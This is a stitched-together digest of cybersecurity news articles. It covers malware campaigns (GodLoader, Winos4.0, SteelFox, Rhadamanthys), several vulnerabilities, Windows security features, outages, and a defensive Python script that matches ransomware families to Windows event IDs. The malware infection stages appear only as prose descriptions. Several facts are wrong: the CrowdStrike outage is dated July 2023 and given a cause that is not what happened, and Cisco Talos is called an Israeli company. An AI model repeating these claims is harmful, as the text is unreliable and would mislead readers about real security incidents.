Infected computers are not only compromised but may also be converted into cryptocurrency mining rigs through XMRig, rendering them unusable for other tasks. 

Stargazers Ghost Network: Distribution-as-a-Service (DaaS) 


The attackers used the Stargazers Ghost Network to distribute GodLoader. This platform, active since 2022, employs over 3,000 ghost GitHub accounts to create networks of malicious repositories. These repositories: 

- Host info stealers like RedLine, Lumma Stealer, Rhadamanthys, and RisePro. 
- Manipulate GitHub’s trending section by starring, forking, and subscribing to their own repositories to appear legitimate. 

During a campaign between September and October 2024, Check Point discovered four separate attacks targeting developers and gamers. These attacks aimed to distribute infected tools and games, enticing users to download malware through seemingly credible GitHub repositories. 

Broader Implications and Future Risks 


The malware’s ability to target multiple platforms significantly enlarges the attack surface, posing a growing threat to the gaming community. Experts warn that attackers could embed malware into cheats, mods, or cracks for popular Godot-built games, increasing the vulnerability of millions of gamers. 

The Stargazers Ghost Network has already earned over $100,000 by distributing malware through its DaaS platform. With its continuous evolution, this network poses an ongoing threat to both developers and users of the Godot engine. 

Call to Action for Developers and Gamers 


Industry experts emphasize the urgent need for proactive cybersecurity measures to counter such threats. Recommendations include: 

- Avoid downloading game assets from unverified sources. 
- Regularly update antivirus and anti-malware software. 
- Implement robust security practices when developing or downloading games built with Godot. 

As the gaming ecosystem continues to expand, vigilance and collaboration between developers and security researchers will be critical in mitigating threats like GodLoader and ensuring a safer gaming environment.

Growing Use of Winos4.0 Toolkit Poses New Threat to Windows Users

 



Security experts warn that the advanced hacking toolkit Winos4.0 is spreading across the globe. Originally reported by Trend Micro, this toolkit, comparable to known kits such as Cobalt Strike and Sliver, was connected to a string of recent cyberattacks in China, where it initially spread through fake software downloads. This year, Fortinet reported that the toolkit is also being distributed through game-themed files, which expands its reach and could put a larger user base at risk.


Attack Framework

Winos4.0 is a post-exploitation toolkit: after gaining initial access to a system, attackers use it for further intrusion and control. It was first discovered inside applications that users downloaded believing them to be useful software, including VPNs and Google Chrome downloads for the Chinese market. Under the aliases Void Arachne or Silver Fox, the attackers lure users with these popular applications, which are packed with malicious components designed to compromise their systems.

More recently, attackers have used game applications to distribute Winos4.0, again targeting mainly Chinese users. In this way, hackers keep changing which attractive downloads they use to penetrate devices.


Infection Stages

When a victim downloads one of these benign-looking files, the Winos4.0 toolkit initiates a four-stage infection:

1. Stage 1: After installation, a DLL file, you.dll, is retrieved from a remote domain. This file establishes persistence on the device by setting values in the Windows Registry so that the malware survives a system restart.

2. Stage 2: The injected shellcode is loaded to resolve the APIs it needs and to communicate with a C2 server, which lets the attackers send commands and retrieve files from the infected device.

3. Stage 3: It fetches more encoded data from the C2 server in a second DLL file named 上线模块.dll, which it saves to the Windows Registry for later use, and updates server addresses to maintain an active link between the malware and its operators.

4. Final Stage: The last stage (login module.dll) will activate all main functions of the toolkit, including detailed system data gathering (like IP address and type of OS), detection of security tools, searching for crypto-wallets, and keeping a hidden backdoor. Through this backdoor connection, hackers can exfiltrate data, execute commands, and sustain their activity monitoring.


Evasion Techniques

Winos4.0 has a built-in scanner that detects security products, including commercial products from Kaspersky, Avast, Bitdefender, and Malwarebytes. If the toolkit finds itself running in a monitored environment, it changes its behaviour to avoid detection or simply quits. This adaptability makes the tool very dangerous in cybercriminals' hands.


Emerging Menace

The fact that the toolkit Winos4.0 is still being used and fine-tuned points towards the growing importance of this toolkit in cyberattack strategies. As explained by Fortinet, it is a versatile and powerful framework "designed for remote control of compromised systems." Ongoing activity like this indicates that Winos4.0 is becoming a tool hackers like to use to gain control over Windows machines.


Preventive Actions

Security experts constantly warn users to be careful about what they download, especially free software or games that seem popular.

Avoid downloading applications and other files from unknown sources. Verifying that a piece of software or a file comes from a legitimate source can also prevent an infection. In addition, keep security software updated.

Awareness of Winos4.0 and how sophisticated it is would keep many users from falling victim to this malware.


Windows PCs at Risk as SteelFox Malware Targets Driver Vulnerabilities



Several experts have warned that hackers are using malware to attack Windows systems with the intention of mining cryptocurrency and stealing sensitive information from their devices. The latest Kaspersky Security Report claims to have spotted tens of thousands of infected endpoints. Cybercriminals have obtained fake cracks and activators for several commercial software products, such as Foxit PDF Editor, JetBrains, or AutoCAD, which they are selling to users. 

The fake cracks ship with a vulnerable driver, WinRing0.sys. By installing this driver, the victim reintroduces CVE-2020-14979 and CVE-2021-41285 onto the system, two three-year-old vulnerabilities that give the attacker the highest possible privileges.

SteelFox is a malware package designed to mine cryptocurrency and steal credit card details with SYSTEM privileges, obtained through the "bring your own vulnerable driver" technique. Its droppers appear on forums and torrent trackers as crack tools that supposedly activate legitimate versions of software such as Foxit PDF Editor, JetBrains products, and AutoCAD.

State-sponsored threat actors and ransomware groups are known to exploit vulnerable drivers to escalate privileges and evade detection. Recently, however, the method appears to have been extended to information-stealing malware as well. According to Kaspersky researchers, the SteelFox campaign was discovered in August of this year, but the malware has been active since February 2023 and has been distributed through various channels (such as torrents, blogs, and forum posts) in the past few weeks.

The Rhadamanthys data theft malware has been available for some time, but since July 2024 a new version of the stealer has been distributed in an ongoing phishing campaign with copyright-related themes. Check Point is tracking this large-scale cybercrime campaign under the name CopyRightAdamantys. It targets the U.S., Europe, East Asia, and South America, among other regions.

According to the company's technical analysis, the campaign impersonates dozens of companies, with each email sent from a different Gmail account and tailored to the impersonated company and to the language of the targeted entity. Almost 70% of the impersonated companies are from the entertainment/media/technology/software sector.

There is an element that stands out about the attacks: the deployment of the Rhadamanthys stealer version 0.7, which, as described by Insikt Group, Recorded Future's security division, early last month, is utilized to carry out optical character recognition. Cisco Talos, an Israeli company that specializes in cyber security, disclosed last week that it had been targeting users of Facebook business and advertising accounts in Taiwan by delivering malware known as Lumma or Rhadamanthys, which is designed to steal information.

The RAR archive contains three components: a legitimate executable vulnerable to DLL side-loading, a malicious DLL containing the stealer payload, and a decoy document. When the binary is executed, it sideloads the DLL, which sets up the environment in which Rhadamanthys is deployed. Based on the scale of the campaign, the variety of lures, and the emails themselves, Check Point considers it likely that the threat actors, attributed to a possible cybercrime group, used artificial intelligence tools to spread the malware.

"It seems likely that this campaign was orchestrated by a financially motivated cybercrime group and not a nation-state actor, particularly given the large number of organizations across multiple regions targeted in this campaign," he continued. "In addition to its global reach, the use of automated phishing tactics, and the use of a variety of lures, this campaign demonstrates how attackers continue to enhance their success rates."

As part of these findings, Kaspersky also revealed a full-featured crimeware bundle dubbed SteelFox, which has been spreading via forum posts, torrent trackers, and blogs, passing itself off as legitimate utilities like Foxit PDF Editor, JetBrains, and AutoCAD in order to steal personal information. In the last two years, the campaign has claimed victims in nearly 50 countries, the majority of them in Brazil, China, Russia, Mexico, the United Arab Emirates, Egypt, Algeria, Vietnam, India, and Sri Lanka.

At this point, no known threat actor or group has been associated with this attack. Security researcher Kirill Korchemny said: "Delivered via sophisticated execution chains, notably shellcode, this type of malware abuses both Windows services and drivers in an attempt to accomplish its objectives." He added that the stealer component collects details about the victim's device as well as credit card information.

The starting point is a dropper that mimics cracked versions of popular software. When run, it requests administrator permissions and drops a next-stage loader which, in turn, establishes persistence and launches the SteelFox module. Although SteelFox's C2 domain is hardcoded, Kaspersky notes that it conceals its infrastructure by rotating across multiple IP addresses and resolving them over DNS over HTTPS. SteelFox attacks have no specific targets but seem to focus on users of AutoCAD, JetBrains, and Foxit PDF Editor.

Based on its visibility, Kaspersky indicates that the malware is compromising systems in Brazil, China, Russia, Mexico, the UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka, among others. SteelFox is a sophisticated crimeware bundle that targets Windows PCs through vulnerable drivers. Still relatively new to the landscape, it shows advanced functionality and appears to be the work of a skilled C++ developer who has integrated multiple external libraries to extend its capabilities.

In a related development, analysts from FortiGuard Labs have reported the discovery of another malicious software framework named Winos4.0. This advanced framework, embedded in game-related applications, is engineered specifically to target Windows users. Originating as an evolved version of the Gh0strat malware, Winos4.0 enables attackers to remotely execute various actions, providing them with substantial control over compromised systems. The infection process for Winos4.0 is particularly deceptive. 

It spreads through game-related applications, such as installation utilities and performance enhancement tools, designed to appeal to gamers and other Windows users. Once an individual downloads and installs one of these compromised applications, a seemingly harmless BMP file is retrieved from a remote server. This file subsequently extracts and activates the Winos4.0 DLL file, initiating the malware’s operations. 

In its initial phase, Winos4.0 sets up an environment for deploying further modules and establishes persistence on the infected machine by modifying system registry keys or creating scheduled tasks. Through this multi-stage infection process, Winos4.0 builds a durable foothold on affected devices, opening avenues for continuous exploitation and control.

JPCERT Explains How to Identify Ransomware Attacks from Windows Event Logs

The Japan Computer Emergency Response Team (JPCERT/CC) has published guidance on identifying ransomware attacks early by reviewing Windows Event Logs. By reviewing these logs, organisations can spot signs of an ongoing ransomware attack and act before the threat spreads across the network.

JPCERT/CC stresses that discovering ransomware as early in the attack as possible is extremely important. Many ransomware variants leave recognisable traces in Windows Event Logs, and knowing what those traces look like can help security teams discover and stop attacks before they spread further. The approach is especially valuable for identifying the type of attack and tracing how the ransomware entered the system.


Types of Event Logs to Monitor

The agency recommends checking four main types of Windows Event Logs, namely: Application, Security, System, and Setup logs. These types can carry some very important clues left by ransomware along with how it came into the environment and what systems are under attack.


Identifiable Ransomware Signatures in Event Logs

The JPCERT/CC report lists several specific log entries associated with particular ransomware families that indicate an active attack.

  • Conti Ransomware: This malware typically generates a broad set of logs associated with the Windows Restart Manager, observable through event IDs 10000 and 10001. Variants such as Akira, LockBit 3.0, HelloKitty, and Bablock generate almost identical logs because they share code with LockBit and Conti. Others, such as 8base and Elbie, also create similar patterns and traces.

  • Midas: This malware changes network configurations to spread across machines. It creates logs with event ID 7040.

  • BadRabbit: BadRabbit mostly creates logs with event ID 7045 when it installs its encryption modules, again suggesting an attack in progress.

  • Bisamware: Generates entries at both ends of a Windows Installer transaction, with event IDs 1040 and 1042.

Older ransomware families, like Shade, GandCrab, and Vice Society, display similar event patterns. In particular, they generate errors with event IDs 13 and 10016, linked to failed access attempts to COM applications. These occur because the ransomware tries to remove Volume Shadow Copies so that victims cannot recover their encrypted files.
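As an added example that is not part of JPCERT/CC's report or this post, the following Python script applies the event ID signatures summarised above to exported event log lines. The event ID to family mapping comes from the text; the line format, the count thresholds and the sample events are constructed assumptions.

```python
"""Correlate Windows Event Log entries with the ransomware signatures from the
JPCERT/CC guidance above.  Added example, not JPCERT/CC code: the event ID to
family mapping is the page's summary; the line format, thresholds and sample
log are constructed here so the script runs offline."""
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass(frozen=True)
class Event:
    ts: datetime
    channel: str      # Application, Security, System or Setup
    provider: str
    event_id: int
    message: str

@dataclass(frozen=True)
class Signature:
    family: str
    event_ids: frozenset   # IDs the guidance names for this family
    require_all: bool      # True: every ID must appear; False: any ID counts
    min_count: int         # matching events needed inside one time window
    note: str

# IDs and families come from the text; min_count values are an assumption so
# that a couple of Restart Manager events from an ordinary software update
# do not look like Conti.
SIGNATURES = [
    Signature("Conti family (Akira, LockBit 3.0, HelloKitty, Bablock, 8base, Elbie)",
              frozenset({10000, 10001}), False, 4,
              "burst of Windows Restart Manager sessions during encryption"),
    Signature("Midas", frozenset({7040}), False, 1,
              "service configuration changed to spread across machines"),
    Signature("BadRabbit", frozenset({7045}), False, 1,
              "new service installed for the encryption modules"),
    Signature("Bisamware", frozenset({1040, 1042}), True, 2,
              "both ends of a Windows Installer transaction"),
    Signature("Shade / GandCrab / Vice Society", frozenset({13, 10016}), True, 2,
              "COM access errors from attempts to delete Volume Shadow Copies"),
]

def parse_events(text: str) -> list:
    """Parse 'ISO-time|channel|provider|id|message' lines; '#' starts a comment."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, channel, provider, event_id, message = line.split("|", 4)
        events.append(Event(datetime.fromisoformat(ts), channel, provider,
                            int(event_id), message))
    return events

def detect(events: list, window: timedelta = timedelta(minutes=15)) -> list:
    """Return one finding (dict) per signature whose rule is satisfied.

    Multi-ID signatures need every ID present, and every signature needs at
    least min_count matching events inside a sliding window of `window`."""
    findings = []
    for sig in SIGNATURES:
        hits = sorted((e for e in events if e.event_id in sig.event_ids),
                      key=lambda e: e.ts)
        if not hits:
            continue
        seen = {e.event_id for e in hits}
        if sig.require_all and seen != sig.event_ids:
            continue
        best, start = 0, 0          # densest window over the sorted hits
        for end in range(len(hits)):
            while hits[end].ts - hits[start].ts > window:
                start += 1
            best = max(best, end - start + 1)
        if best < sig.min_count:
            continue
        findings.append({"family": sig.family, "event_ids": tuple(sorted(seen)),
                         "count": len(hits), "first": hits[0].ts,
                         "last": hits[-1].ts, "note": sig.note})
    return sorted(findings, key=lambda f: f["first"])

# Constructed sample log: one service install, a Restart Manager burst, a full
# Installer transaction and an isolated DCOM error (no matching event 13).
SAMPLE_LOG = """
# time|channel|provider|id|message
2024-10-01T09:58:03|System|Service Control Manager|7045|A service was installed in the system: Backup Agent
2024-10-01T10:02:11|Application|Microsoft-Windows-RestartManager|10000|Starting session 1
2024-10-01T10:02:12|Application|Microsoft-Windows-RestartManager|10001|Ending session 1
2024-10-01T10:02:12|Application|Microsoft-Windows-RestartManager|10000|Starting session 2
2024-10-01T10:02:13|Application|Microsoft-Windows-RestartManager|10001|Ending session 2
2024-10-01T10:03:40|Application|MsiInstaller|1040|Beginning a Windows Installer transaction
2024-10-01T10:03:55|Application|MsiInstaller|1042|Ending a Windows Installer transaction
2024-10-01T10:04:10|System|DistributedCOM|10016|The application-specific permission settings do not grant Local Activation permission
"""

def scan_sample() -> list:
    """Run the detector over SAMPLE_LOG and return the findings."""
    return detect(parse_events(SAMPLE_LOG))

if __name__ == "__main__":
    for f in scan_sample():
        print(f"{f['first']:%H:%M:%S} {f['family']}: {f['count']} x {f['event_ids']} - {f['note']}")
```

A single event 7045 fires the BadRabbit rule exactly as the text describes, so findings still need triage against the installed service's name and binary path; the count and time span in each finding are there to support that triage.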


Event Log Monitoring: Not a Silver Bullet But a Mighty Defence

Monitoring these specific Windows Event Logs can be very useful for identifying ransomware, but JPCERT/CC stresses that it should only be one part of an overall security strategy. Early detection becomes truly effective when it is combined with other controls that stop the attack from spreading.

Perhaps surprisingly, this method works much better for newer ransomware variants than for older ones such as WannaCry and Petya, which left very few traces in Windows logs. As ransomware evolves, the patterns it leaves in logs are becoming more distinctive, making log monitoring an increasingly valuable early-warning tool for today's cybersecurity infrastructure.

In 2022, SANS, another well-known cybersecurity group, published its own guide to detecting ransomware from Windows Event Logs. Both sources show how ransomware detection has evolved over time, helping organisations better prepare for such threats.


Critical Flaw in Open Policy Agent Exposed NTLM Credentials, Patch Released


A now-resolved security vulnerability in Styra's Open Policy Agent (OPA) could have exposed New Technology LAN Manager (NTLM) hashes, potentially leading to credential leakage. If exploited, the flaw allowed attackers to capture the NTLM credentials of the OPA server’s local user account and send them to a remote server. From there, they could either crack the password or relay the authentication, according to a report by cybersecurity firm Tenable, shared with The Hacker News.

The vulnerability, identified as CVE-2024-8260 and classified as a Server Message Block (SMB) force-authentication flaw, affected both the Command Line Interface (CLI) and the Go software development kit (SDK) on Windows. The issue arose from improper input validation, enabling unauthorized access by leaking the Net-NTLMv2 hash of the logged-in user on the Windows device running OPA.

Exploiting this vulnerability required specific conditions: the attacker had to have an initial foothold, for example through social engineering; the victim's environment had to allow outbound SMB traffic over port 445; and the OPA CLI had to be run with a Universal Naming Convention (UNC) path rather than a Rego rule file.

Tenable security researcher Shelly Raban explained that when a Windows machine accesses a remote share, it sends the NTLM hash of the local user to authenticate to the remote server. Attackers can capture these credentials to perform relay attacks or crack the password offline. Following the responsible disclosure in June 2024, the issue was patched in version 0.68.0, released on August 29, 2024.

Tenable emphasized the importance of securing open-source projects to avoid exposing vendors and users to potential threats. The disclosure of this vulnerability coincides with Akamai's revelation of a privilege escalation flaw (CVE-2024-43532) in Microsoft's Remote Registry Service, which also involved NTLM relay attacks.

Microsoft, in response to NTLM vulnerabilities, reiterated its commitment to replace NTLM with Kerberos in Windows 11 to enhance authentication security.

How to Enhance Your Windows Security with Memory Integrity


Windows Security, the antivirus program built into Microsoft’s operating system, is generally sufficient for most users. It provides a decent level of protection against various threats, but a few important features, like Memory Integrity, remain turned off by default. This setting is crucial as it protects your system’s memory from malicious software that attempts to exploit Windows drivers, potentially taking control of your PC.

When you enable Memory Integrity, it activates Virtualization Based Security (VBS). This feature separates the code verification process from the operating system, creating a secure environment and adding an additional layer of protection. Essentially, VBS ensures that any code executed on your system is thoroughly checked, preventing malicious programs from sneaking through Windows’ defenses.

However, Microsoft disables Memory Integrity by default to maintain smoother app performance. Some applications may not function properly with this feature on, as the extra layer of security can interfere with the way certain programs execute code. For users who prioritize app performance over security, this trade-off may seem appealing.

But for those concerned about malicious attacks, enabling Memory Integrity is a smart choice. It prevents malware from bypassing the usual system checks, providing peace of mind when dealing with potential security threats. On older PCs, though, you might notice a slight reduction in performance once Memory Integrity is activated.

Curious to see how your system handles this extra protection? Enabling and disabling Memory Integrity is a simple process. First, type “Windows Security” into the search bar or Start menu. Under Device Security, you may see a notification if Memory Integrity is off. Click Core Isolation, then toggle Memory Integrity on. To deactivate it, return to the same settings and flip the switch off.

It’s not just Memory Integrity that comes disabled by default in Windows. Microsoft leaves certain protections off to strike a balance between security and user experience. Another useful feature you can enable is ransomware protection, which safeguards specific folders and prevents unauthorized apps from locking you out of your data. Similarly, you can turn on advanced app screening to block potentially harmful programs.

While leaving Memory Integrity and other protections off can offer a smoother computing experience, activating them significantly strengthens your system’s defenses against cyber threats. It’s a choice between performance and security, but for those prioritizing protection, flipping these settings on is an easy step towards a safer PC.

Windows 11’s Recall feature is Now Ready For Release, Microsoft Claims


Microsoft has released an update regarding the Recall feature in Windows 11, which has been on hold for some time owing to security and privacy concerns. The document also details when Microsoft intends to move forward with the feature and roll it out to Copilot+ PCs. 

Microsoft said in a statement that it intends to launch Recall on Copilot+ laptops in November, with a number of protections in place to make the feature safe enough, as explained in a separate blog post. So what are the measures meant to appease the critics of Recall, a supercharged AI-powered search in Windows 11 that takes regular screenshots ('snapshots', as Microsoft calls them) of the activity on your PC?

One of the most significant changes is that, as Microsoft had previously informed us, Recall will only be available with permission, rather than being enabled by default as it was when the function was first introduced. 

“During the set-up experience for Copilot+ PCs, users are given a clear option whether to opt-in to saving snapshots using Recall. If a user doesn’t proactively choose to turn it on, it will be off, and snapshots will not be taken or saved,” Microsoft noted. 

Additionally, as Microsoft has stated, snapshots and other Recall-related data will be fully encrypted, and Windows Hello login will be required to access the service. In other words, you'll need to sign in through Hello to prove that you're the one using Recall (and not someone else on your PC).

Furthermore, Recall will use a secure environment known as a Virtualization-based Security Enclave, or VBS Enclave, which is a fully secure virtual computer isolated from the Windows 11 system that can only be accessed by the user via a decryption key (given with the Windows Hello sign-in).

David Weston, who wrote Microsoft’s blog post and is VP of Enterprise and OS Security, explained to Windows Central: “All of the sensitive Recall processes, so screenshots, screenshot processing, vector database, are now in a VBS Enclave. We basically took Recall and put it in a virtual machine [VM], so even administrative users are not able to interact in that VM or run any code or see any data.”

Similarly, Microsoft cannot access your Recall data. And, as the software giant has already stated, all of this data is stored locally on your machine; none of it is sent to the cloud. This is why Recall is only available on Copilot+ PCs - it requires a strong NPU for acceleration and local processing to function properly. 

Finally, Microsoft addresses a previous issue about Recall storing images of, say, your online banking site and perhaps sensitive financial information - the tool now filters out things like passwords and credit card numbers.

Experts Find Sinkclose Bug in Millions of AMD Processors, Hard to Patch

A recently discovered major security flaw called 'Sinkclose' affects virtually all of AMD's processors released since 2006. The vulnerability allows threat actors to infiltrate a system so deeply that the malicious software becomes very hard to identify and remove. According to experts, the problem is serious: in some cases it would be easier to discard the system than to fix it.

About Sinkclose Bug

There is a good side to it: since the flaw went unnoticed for 18 years, chances are it has not been exploited. Additionally, AMD is patching its platforms to protect the affected processors, although not all of them have received a patch yet. See this list for full details.

Sinkclose is notable for escaping antivirus tools and persisting even after the OS is reinstalled. The bug allows threat actors to execute code within the processor's System Management Mode (SMM), a privileged region reserved for critical firmware operations. To use the flaw, threat actors must first gain access to the system's kernel, which is difficult but doable; in other words, the system must already have been compromised by some other attack.

Persistent Threat

After securing that access, the Sinkclose vulnerability lets attackers install bootkit malware that escapes detection by antivirus tools, stays hidden within the system, and persists even after the OS is reinstalled.

The flaw abuses a feature in AMD chips called TClose, which maintains compatibility with older devices. By exploiting this feature, the researchers could redirect the processor to execute their code at the SMM level. The process is complicated, but it gives attackers deep access to and control over the device.

Flaw Needs Kernel-level Access

Cybersecurity experts Krzysztof Okupski and Enrique Nissim from IOActive found the Sinkclose vulnerability and will present it at the Defcon conference. "To take advantage of the vulnerability, a hacker has to already possess access to a computer's kernel, the core of its operating system," AMD told Wired.

Experts highlight that although the Sinkclose exploit needs kernel-level access, flaws at that level are regularly found in Linux and Windows systems, and advanced state-sponsored hackers might already have what it takes to exploit them.

Since kernel exploits are readily available, Sinkclose effectively becomes the second stage of an attack. To eliminate the malware, one must open the computer, connect to a particular part of its memory using an SPI flash programmer, inspect the memory carefully, and then remove the malware.

CrowdStrike Explains Root Cause of Global IT Outage

In July 2023, we witnessed a large-scale global breakdown impacting over 8.5 million Microsoft users. The reason? A software update that turned into chaos. Leading cybersecurity company CrowdStrike recently published its root cause analysis, providing insights on the incident. Let's understand what happened.

The Global IT Outage

The incident started with a routine software update. Microsoft users worldwide were expecting new features and security updates. But the update carried a hidden landmine: a defect in CrowdStrike's Falcon sensor.

The Repercussions

The damage was sudden and severe. Organizations stopped working, government agencies had problems, and important services were hindered. The breakdown underscored our reliance on tech and the downside of interconnected systems.

The Root Problem

Sensor Defect

CrowdStrike's Falcon software oversees security, identifying threats and anomalies. The faulty sensor content was part of the update and triggered a chain reaction: it misread genuine traffic as suspicious, which led to worldwide chaos.

Lack of Testing

Experts have underscored the need for rigorous testing, and questions were raised about how critical bugs made it through. The answer lies in hasty development cycles and the rush to meet deadlines: quality control was neglected, with dangerous consequences.

Preventive Measures

CrowdStrike has acknowledged the mistake and is taking preventive measures to avoid such incidents in future:

  • It now conducts exhaustive testing, simulating various scenarios before deploying updates. Rigorous checks ensure no hidden surprises.
  • The company commits to transparency. Users will receive detailed release notes, highlighting changes and potential risks.
  • CrowdStrike collaborates with other cybersecurity firms and Microsoft itself. Sharing insights and best practices strengthens the ecosystem.

Takeaways

For Users

  • Vigilance: Stay informed about software updates. Read release notes and understand changes.
  • Backup Plans: Prepare for outages. Regular backups and redundancy can save the day.

For Developers

  • Quality Over Speed: Rushed releases lead to disasters. Prioritize quality assurance.
  • Test Thoroughly: Test, retest, and then test some more. Remember to consider the impact of a single line of code.

The CrowdStrike-Microsoft debacle serves as a wake-up call. The hyper-connected reality has weaknesses too: a minor glitch can turn into global turmoil.

Microsoft Update Alert: 70% Of Windows Users Are Now At Risk


Microsoft's end-of-support date for Windows 10 is approaching on October 14, 2025, and the operating system is already facing a serious security threat. With 70% of Windows users still running Windows 10, the risk of cyber-attacks has become increasingly serious. This security flaw has major consequences for individuals and organisations who rely on Windows 10.

What's happening?

A 2018 Windows flaw has been added to the US government's known exploited vulnerabilities (KEV) database, warning of potential privilege escalation attacks and remote code execution. Researchers believe that the vulnerability, CVE-2018-0824, was exploited by the Chinese hacker outfit APT41. This threat actor is backed by the Ministry of State Security and is considered highly dangerous because it targets both government and private organisations.

The US government has warned users to patch, or stop using, affected Windows systems by August 26 if there is any risk. Otherwise, they will remain vulnerable to attack. The vulnerability does not affect Windows 11, nor does it affect fully updated Windows systems, which underlines the importance of updates. The warnings appear to be insufficient, as many users continue to use Windows 10, with only 30% having moved to Windows 11.

Furthermore, as the end-of-support date approaches, hundreds of scam emails are likely to target Windows 10 customers' inboxes. The hackers would take advantage of this situation and jeopardise the security of users' data and systems, resulting in data breaches and other serious consequences such as system compromise and financial losses. 

Take a look at Reddit or the comments on this post to see the enormous number of Windows users who are waiting for Microsoft to pull a late rabbit out of the bag and expand Windows 10 support. It is unclear how this will affect all those who have invested in upgrading. 

Given the recent experience, with global images of blue screens of death all around, come October, this could be a hackers' paradise for a while. Another aspect to consider is that malicious actors would take advantage of the situation and send out scam after scam to nervous Windows 10 users.

Report: macOS Most Vulnerable to Endpoint Attacks Compared to Windows and Linux


A new report from Picus Security has unveiled a concerning vulnerability in many IT environments: a high risk of complete takeover through escalated privileges. 

Simulated attacks revealed that while organizations can typically defend against seven out of ten attacks, the persistent threat of sophisticated cybercrime syndicates leaves a substantial margin for error.

Full environment takeovers occur when attackers gain administrator-level access, enabling them to freely navigate and compromise systems. Alarmingly, Picus successfully achieved domain admin access in 40% of the tested environments.

While Linux and Windows demonstrated relatively strong defenses against endpoint attacks, macOS proved significantly more vulnerable, raising concerns about its security posture. Picus CTO Volkan Ertürk emphasized the need for increased focus on securing macOS systems, recommending the use of threat repositories like the Picus Threat Library to identify and address vulnerabilities.

The report also highlighted the prevalence of basic security lapses, with a quarter of companies using easily guessable passwords and a mere 9% effectively preventing data exfiltration. Cybercrime groups like BlackByte, BabLock, and Hive posed the most significant challenges for organizations.

“Like a cascade of falling dominoes that starts with a single push, small gaps in cybersecurity can lead to big breaches,” said Dr. Suleyman Ozarslan, Picus co-founder and VP of Picus Labs.

"It's clear that organizations are still experiencing challenges when it comes to threat exposure management and balancing priorities. Small gaps that lead to attackers obtaining domain admin access are not isolated incidents; they are widespread. Last year, the attack on MGM used domain admin privileges and super admin accounts. It stopped slot machines, shut down virtually all systems, and blocked a multi-billion-dollar company from doing business for days," Ozarslan said.

Passwords Vanish for 15 Million Windows Users, Google Says "Sorry"

Google says "sorry" after a bug stopped Windows users from finding or saving their passwords. The issue began on 24 July and lasted until 25 July, when it was fixed. The problem, Google said, was due to "a change in product behavior without proper feature guard," an incident that shares similarities with the recent CrowdStrike disruption.

The disappearing password problem affected Chrome users worldwide, causing them trouble finding saved passwords. Users even had trouble finding newly saved passwords. Google has fixed the issue now, saying the problem was in the M127 version of Chrome Browser on Windows devices.

Who were the victims?

It is difficult to pinpoint exact numbers, but based on Google's 3 billion Chrome users worldwide, we can arrive at a rough estimate. According to experts, around 15 million users experienced the vanishing password problem. "Impacted users were unable to find passwords in Chrome's password manager. Users can save passwords, however they were not visible to them. The impact was limited to the M127 version of Chrome Browser on the Windows platform," said Google.

The password problem is now fixed

Fortunately, Google has now fixed the issue; users only need to restart their Chrome browsers. "We apologize for the inconvenience this service disruption/outage may have caused," said Google. Users experiencing problems beyond what Google has covered can contact Google Workspace Support.

Chrome Password Manager: How to use it?

Google's Chrome password manager may be accessed through the browser's three-dot menu by selecting Passwords & Autofill, then Google Password Manager. Alternatively, you can install the password manager Chrome app from the password manager settings and then access it from the Google Apps menu. If Chrome invites you to autofill a password, clicking Manage Passwords will take you directly there.

Things that went missing besides passwords recently

According to cybersecurity reporter Brian Krebs, the email verification step for creating a new Google Workspace account also went missing for a few Chrome users.

The authentication problem, now fixed, allowed threat actors to skip the email verification needed to create a Google Workspace account and thereby impersonate a domain holder at third-party services, for example by logging in to a Dropbox account.